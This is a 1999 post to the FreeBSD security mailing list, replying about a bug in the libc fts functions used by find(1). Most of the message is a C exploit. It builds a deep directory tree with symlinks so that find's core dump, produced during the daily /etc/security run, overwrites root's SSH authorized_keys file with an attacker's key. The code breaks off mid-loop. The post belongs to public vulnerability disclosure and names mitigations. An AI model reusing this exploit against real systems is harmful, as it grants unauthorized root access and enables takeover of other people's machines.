From owner-freebsd-security Wed Aug 25 0:16:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from mx1.lublin.pl (mx1.lublin.pl [212.182.63.76]) by hub.freebsd.org (Postfix) with ESMTP id 4B89716D03 for ; Wed, 25 Aug 1999 00:14:25 -0700 (PDT) (envelope-from venglin@FreeBSD.lublin.pl) Received: from lagoon.freebsd.lublin.pl ([212.182.117.180]:33547 "HELO lagoon.FreeBSD.lublin.pl") by krupik.man.lublin.pl with SMTP id ; Wed, 25 Aug 1999 09:13:54 +0200 Received: (qmail 91010 invoked by uid 66); 25 Aug 1999 07:16:24 -0000 Received: (qmail 18360 invoked from network); 25 Aug 1999 07:13:28 -0000 Received: from lagoon.gadaczka.org (HELO lagoon.gadaczka.FreeBSD.lublin.pl) (venglin@192.168.0.2) by mailhost.gadaczka.org with SMTP; 25 Aug 1999 07:13:28 -0000 Message-ID: X-Mailer: XFMail 1.3 [p0] on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT MIME-Version: 1.0 In-Reply-To: X-SMS: +48601383657@text.plusgsm.pl X-PGP: PGP key on WWW or finger X-Operating-System: FreeBSD 3.2-STABLE (i386) Date: Wed, 25 Aug 1999 09:13:18 +0200 (CEST) Organization: Lubelska Grupa Uzytkownikow BSD From: Przemyslaw Frasunek To: Rafal Banaszkiewicz Subject: RE: fts_print() , find and other stuff ? Cc: freebsd-security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 24-Aug-99 Rafal Banaszkiewicz wrote: > One of my friends has written sploit code for this bug ? It's old > bug ... and it's still not fixed . Yes, this bug is quite easy to exploit. Find(1) runs every day from /etc/security script. It segfaults, when directory tree is _very_ long, because of junk pointer to directory name. Core is created in one of directories from our tree. But if find.core already exists, it's overwritten. It's possible to create symlink from eg. master.passwd or something else to find.core, and this file will be overwritten. Sample code below. BTW. Sorry for my poor English. /* (c) 1999 babcia padlina ltd. bug in fts libc functions allows to overwrite any file in system, when running /etc/security script (executed from 'daily' scripts). affected systems: - freebsd (all versions) - probably openbsd/netbsd fix: - limit root's coredump size - patch libc */ #include #include #include #include #include #define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n" #define FILE "/root/.ssh/authorized_keys" #define CORE "find.core" #define DEPTH 300 #define BUFSIZE 250 int makedir(dir, linkfrom, linkto) char *dir, *linkfrom, *linkto; { if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO))) return -1; if (chdir(dir)) return -1; if (symlink(linkfrom, linkto) < 0) return -1; return 0; } int main(void) { int i = 0; char pid[10], buf[BUFSIZE]; sprintf(pid, "%d", getpid()); if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) { perror("mkdir()"); return -1; } if (chdir(pid)) { perror("chdir()"); return -1; } bzero(buf, BUFSIZE); memset(buf, 0x41, BUFSIZE-1); for(i=0;i